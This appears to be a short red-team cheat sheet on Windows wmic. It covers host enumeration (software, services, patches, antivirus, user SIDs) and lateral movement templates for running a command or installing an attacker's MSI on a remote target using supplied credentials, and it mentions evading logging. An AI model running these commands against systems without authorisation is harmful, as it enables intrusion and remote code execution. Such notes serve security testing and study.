# wmic The wmic command on Windows is extremely useful, but is also deprecated (*because* of its usefulness to attackers!). It can be used on Windows 10 21H1 and earlier. For later systems, PowerShell command-lets will need to be used instead (which increases the risk that activity will be logged). - `wmic product get name,version,vendor` - list all installed software (but misses 32-bit applications installed on a 64-bit OS) - `wmic service get name,displayname,pathname,startmode` - list all services - `wmic qfe get caption,description,hotfixid,installedon` - list installed updates - `wimc service list brief` - another way of listing services - `wmic service where "name like '$SERVICE_NAME'" get name,pathname` - get information about a particular service - `wmic /namespace:\root\securitycenter2 path antivirusproduct` - enumerate antivirus - `wmic useraccount get name,sid` - Display SIDs for all (local) users ## Remote process creation ```powershell wmic.exe /user:$TARGET_USER ` /password:$TARGET_PASSWORD ` /node:$TARGET_HOST ` process call create "$SOME_COMMAND" ``` ## Install an MSI package ```powershell wmic.exe /user:$TARGET_USER ` /password:$TARGET_PASSWORD ` /node:$TARGET_HOST ` product call install PackageLocation=$PATH_TO_ATTACKER_MSI ```